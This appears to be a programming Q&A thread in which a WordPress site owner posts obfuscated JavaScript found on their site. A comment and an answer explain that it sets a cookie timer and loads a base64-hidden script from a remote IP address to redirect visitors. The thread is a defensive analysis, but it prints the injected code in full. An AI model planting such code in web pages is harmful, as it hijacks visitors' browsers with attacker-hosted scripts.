# What does the following JavaScript code do?

Tags: javascript, wordpress

```
function getCookie(e)
{var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')}
```

I've deleted it and changed my password, what effect will it cause?

Comment: The obfuscated code will run a script: `<script src=" http://193.238.46.6/mRPPzC"></script>`. I won't analyze further don't want to even touch that code.

Answer (score 1):

**tl;dr:** Basically the script redirects the user after some time to another shady website.

1. It checks for a redirect cookie to determine when a redirect should take place.
2. If it should, it loads the payload script encoded in [Base64](https://en.wikipedia.org/wiki/Base64).
3. The payload - another JavaScript snippet - loads another script file from an IP address
4. The last script actually redirects the user to another page.